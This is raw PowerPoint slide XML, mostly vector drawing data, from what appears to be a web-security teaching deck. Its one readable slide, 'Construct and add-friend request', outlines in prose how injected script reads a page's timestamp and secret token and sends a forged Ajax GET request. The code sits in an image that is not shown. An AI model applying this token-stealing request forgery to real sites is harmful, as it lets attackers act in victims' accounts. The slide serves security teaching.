                    <a:pt x="61" y="5"/>
                    <a:pt x="27" y="0"/>
                    <a:pt x="10" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="11"/>
                    <a:pt x="3" y="11"/>
                    <a:pt x="8" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="13"/>
                    <a:pt x="64" y="29"/>
                    <a:pt x="70" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="59"/>
                    <a:pt x="72" y="60"/>
                    <a:pt x="72" y="78"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="183"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="206"/>
                    <a:pt x="76" y="214"/>
                    <a:pt x="92" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="241"/>
                    <a:pt x="117" y="246"/>
                    <a:pt x="130" y="250"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="261"/>
                    <a:pt x="72" y="284"/>
                    <a:pt x="72" y="313"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="43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37" name="Freeform 978">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A8C8E3D-E56D-48FF-B99A-16B755CA061B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId154"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1120776" y="2614613"/>
              <a:ext cx="22225" cy="22225"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 31 h 62"/>
                <a:gd name="T2" fmla="*/ 31 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 62"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 62"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 62 h 62"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 31 h 62"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="62" h="62">
                  <a:moveTo>
                    <a:pt x="62" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="13"/>
                    <a:pt x="47" y="0"/>
                    <a:pt x="31" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="15"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="49"/>
                    <a:pt x="15" y="62"/>
                    <a:pt x="31" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="62"/>
                    <a:pt x="62" y="47"/>
                    <a:pt x="62"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38" name="Freeform 979">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{681E85E5-F65B-4B16-B71A-50158A67813C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId155"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1211263" y="2614613"/>
              <a:ext cx="20638" cy="22225"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 31 h 62"/>
                <a:gd name="T2" fmla="*/ 32 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 62"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 62"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 62 h 62"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 31 h 62"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="62" h="62">
                  <a:moveTo>
                    <a:pt x="62" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="13"/>
                    <a:pt x="47" y="0"/>
                    <a:pt x="32" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="15"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="49"/>
                    <a:pt x="15" y="62"/>
                    <a:pt x="31" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="62"/>
                    <a:pt x="62" y="47"/>
                    <a:pt x="62"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39" name="Freeform 980">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9802965B-F6C5-4C84-B150-2B5BE37B5870}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId156"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1301751" y="2614613"/>
              <a:ext cx="20638" cy="22225"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 31 h 62"/>
                <a:gd name="T2" fmla="*/ 31 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 62"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 62"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 62 h 62"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 31 h 62"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="62" h="62">
                  <a:moveTo>
                    <a:pt x="62" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="13"/>
                    <a:pt x="47" y="0"/>
                    <a:pt x="31" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="15"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="49"/>
                    <a:pt x="15" y="62"/>
                    <a:pt x="31" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="62"/>
                    <a:pt x="62" y="47"/>
                    <a:pt x="62"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40" name="Freeform 981">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FEBF21E-E8B6-492C-9377-897FBE37A3A0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId157"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="917576" y="2714626"/>
              <a:ext cx="61913" cy="176213"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 72 w 177"/>
                <a:gd name="T1" fmla="*/ 432 h 499"/>
                <a:gd name="T2" fmla="*/ 4 w 177"/>
                <a:gd name="T3" fmla="*/ 488 h 499"/>
                <a:gd name="T4" fmla="*/ 0 w 177"/>
                <a:gd name="T5" fmla="*/ 493 h 499"/>
                <a:gd name="T6" fmla="*/ 10 w 177"/>
                <a:gd name="T7" fmla="*/ 499 h 499"/>
                <a:gd name="T8" fmla="*/ 105 w 177"/>
                <a:gd name="T9" fmla="*/ 436 h 499"/>
                <a:gd name="T10" fmla="*/ 105 w 177"/>
                <a:gd name="T11" fmla="*/ 323 h 499"/>
                <a:gd name="T12" fmla="*/ 125 w 177"/>
                <a:gd name="T13" fmla="*/ 271 h 499"/>
                <a:gd name="T14" fmla="*/ 172 w 177"/>
                <a:gd name="T15" fmla="*/ 255 h 499"/>
                <a:gd name="T16" fmla="*/ 177 w 177"/>
                <a:gd name="T17" fmla="*/ 249 h 499"/>
                <a:gd name="T18" fmla="*/ 169 w 177"/>
                <a:gd name="T19" fmla="*/ 244 h 499"/>
                <a:gd name="T20" fmla="*/ 106 w 177"/>
                <a:gd name="T21" fmla="*/ 199 h 499"/>
                <a:gd name="T22" fmla="*/ 105 w 177"/>
                <a:gd name="T23" fmla="*/ 175 h 499"/>
                <a:gd name="T24" fmla="*/ 105 w 177"/>
                <a:gd name="T25" fmla="*/ 76 h 499"/>
                <a:gd name="T26" fmla="*/ 81 w 177"/>
                <a:gd name="T27" fmla="*/ 20 h 499"/>
                <a:gd name="T28" fmla="*/ 10 w 177"/>
                <a:gd name="T29" fmla="*/ 0 h 499"/>
                <a:gd name="T30" fmla="*/ 0 w 177"/>
                <a:gd name="T31" fmla="*/ 5 h 499"/>
                <a:gd name="T32" fmla="*/ 8 w 177"/>
                <a:gd name="T33" fmla="*/ 11 h 499"/>
                <a:gd name="T34" fmla="*/ 70 w 177"/>
                <a:gd name="T35" fmla="*/ 54 h 499"/>
                <a:gd name="T36" fmla="*/ 72 w 177"/>
                <a:gd name="T37" fmla="*/ 78 h 499"/>
                <a:gd name="T38" fmla="*/ 72 w 177"/>
                <a:gd name="T39" fmla="*/ 182 h 499"/>
                <a:gd name="T40" fmla="*/ 91 w 177"/>
                <a:gd name="T41" fmla="*/ 230 h 499"/>
                <a:gd name="T42" fmla="*/ 130 w 177"/>
                <a:gd name="T43" fmla="*/ 249 h 499"/>
                <a:gd name="T44" fmla="*/ 72 w 177"/>
                <a:gd name="T45" fmla="*/ 313 h 499"/>
                <a:gd name="T46" fmla="*/ 72 w 177"/>
                <a:gd name="T47" fmla="*/ 432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7" h="499">
                  <a:moveTo>
                    <a:pt x="72" y="432"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="452"/>
                    <a:pt x="59" y="484"/>
                    <a:pt x="4" y="488"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="488"/>
                    <a:pt x="0" y="490"/>
                    <a:pt x="0" y="493"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="499"/>
                    <a:pt x="5" y="499"/>
                    <a:pt x="10" y="499"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="499"/>
                    <a:pt x="104" y="474"/>
                    <a:pt x="105" y="436"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="105" y="323"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="303"/>
                    <a:pt x="105" y="287"/>
                    <a:pt x="125" y="271"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="256"/>
                    <a:pt x="161" y="255"/>
                    <a:pt x="172" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="254"/>
                    <a:pt x="177" y="252"/>
                    <a:pt x="177" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="244"/>
                    <a:pt x="174" y="244"/>
                    <a:pt x="169" y="244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="242"/>
                    <a:pt x="112" y="224"/>
                    <a:pt x="106" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="194"/>
                    <a:pt x="105" y="193"/>
                    <a:pt x="105" y="175"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="105" y="76"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="55"/>
                    <a:pt x="105" y="39"/>
                    <a:pt x="81" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="5"/>
                    <a:pt x="27" y="0"/>
                    <a:pt x="10" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="10"/>
                    <a:pt x="3" y="10"/>
                    <a:pt x="8" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="13"/>
                    <a:pt x="64" y="29"/>
                    <a:pt x="70" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="59"/>
                    <a:pt x="72" y="60"/>
                    <a:pt x="72" y="78"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="182"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="205"/>
                    <a:pt x="76" y="214"/>
                    <a:pt x="91" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="240"/>
                    <a:pt x="116" y="245"/>
                    <a:pt x="130" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="261"/>
                    <a:pt x="72" y="284"/>
                    <a:pt x="72" y="313"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="43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41" name="Freeform 982">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C685D64C-4880-40E0-B433-0004FCB8D056}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId158"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1022351" y="2771776"/>
              <a:ext cx="26988" cy="100013"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 72 w 74"/>
                <a:gd name="T1" fmla="*/ 31 h 284"/>
                <a:gd name="T2" fmla="*/ 41 w 74"/>
                <a:gd name="T3" fmla="*/ 0 h 284"/>
                <a:gd name="T4" fmla="*/ 10 w 74"/>
                <a:gd name="T5" fmla="*/ 31 h 284"/>
                <a:gd name="T6" fmla="*/ 41 w 74"/>
                <a:gd name="T7" fmla="*/ 62 h 284"/>
                <a:gd name="T8" fmla="*/ 72 w 74"/>
                <a:gd name="T9" fmla="*/ 31 h 284"/>
                <a:gd name="T10" fmla="*/ 43 w 74"/>
                <a:gd name="T11" fmla="*/ 215 h 284"/>
                <a:gd name="T12" fmla="*/ 10 w 74"/>
                <a:gd name="T13" fmla="*/ 255 h 284"/>
                <a:gd name="T14" fmla="*/ 0 w 74"/>
                <a:gd name="T15" fmla="*/ 268 h 284"/>
                <a:gd name="T16" fmla="*/ 16 w 74"/>
                <a:gd name="T17" fmla="*/ 284 h 284"/>
                <a:gd name="T18" fmla="*/ 74 w 74"/>
                <a:gd name="T19" fmla="*/ 201 h 284"/>
                <a:gd name="T20" fmla="*/ 41 w 74"/>
                <a:gd name="T21" fmla="*/ 153 h 284"/>
                <a:gd name="T22" fmla="*/ 10 w 74"/>
                <a:gd name="T23" fmla="*/ 183 h 284"/>
                <a:gd name="T24" fmla="*/ 43 w 74"/>
                <a:gd name="T25" fmla="*/ 215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284">
                  <a:moveTo>
                    <a:pt x="72" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="13"/>
                    <a:pt x="57" y="0"/>
                    <a:pt x="41" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="0"/>
                    <a:pt x="10" y="15"/>
                    <a:pt x="10" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="49"/>
                    <a:pt x="25" y="62"/>
                    <a:pt x="41" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="62"/>
                    <a:pt x="72" y="47"/>
                    <a:pt x="72" y="31"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="43" y="215"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="242"/>
                    <a:pt x="17" y="251"/>
                    <a:pt x="10" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="257"/>
                    <a:pt x="0" y="260"/>
                    <a:pt x="0" y="268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="276"/>
                    <a:pt x="7" y="284"/>
                    <a:pt x="16" y="284"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="284"/>
                    <a:pt x="74" y="257"/>
                    <a:pt x="74" y="201"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="169"/>
                    <a:pt x="60" y="153"/>
                    <a:pt x="41" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="153"/>
                    <a:pt x="10" y="167"/>
                    <a:pt x="10" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="197"/>
                    <a:pt x="18" y="215"/>
                    <a:pt x="43" y="21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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1802" name="TextBox 1801">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{209DA713-EDC7-4CFF-9279-8A53FAAE9E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8298366" y="1826712"/>
            <a:ext cx="398463" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>①</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1803" name="TextBox 1802">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E993289-83DC-4F76-82CF-C694A9C2F036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8298366" y="2091825"/>
            <a:ext cx="398463" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>②</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1599063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ACEDB-2290-421A-83FE-45462F894496}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Construct and add-friend request</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA518835-68C6-4917-9DCA-6843633F7FB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="192024" y="867512"/>
            <a:ext cx="3027369" cy="3763103"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Line ① and ②</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:  Get timestamp and secret token from the JavaScript variables.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Line ③ and ④</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Construct the URL with the data attached.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The rest of the code is to create a GET request using Ajax.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFF1B7C5-C934-4955-BB19-94CC9FAF0630}"/>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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="888888"/>
              </a:solidFill>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{151029B6-641E-4F4E-8401-0B8F190A9E77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3219393" y="867513"/>
            <a:ext cx="5726821" cy="3408476"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99429F96-AEB1-4A51-B9F7-127B66F2296E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8571801" y="1575553"/>
            <a:ext cx="398463" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>①</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64345E63-3380-4F3E-9A2F-BC4847109AB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8571801" y="1840666"/>
            <a:ext cx="398463" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>②</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" sz="1100" b="1" dirty="0">
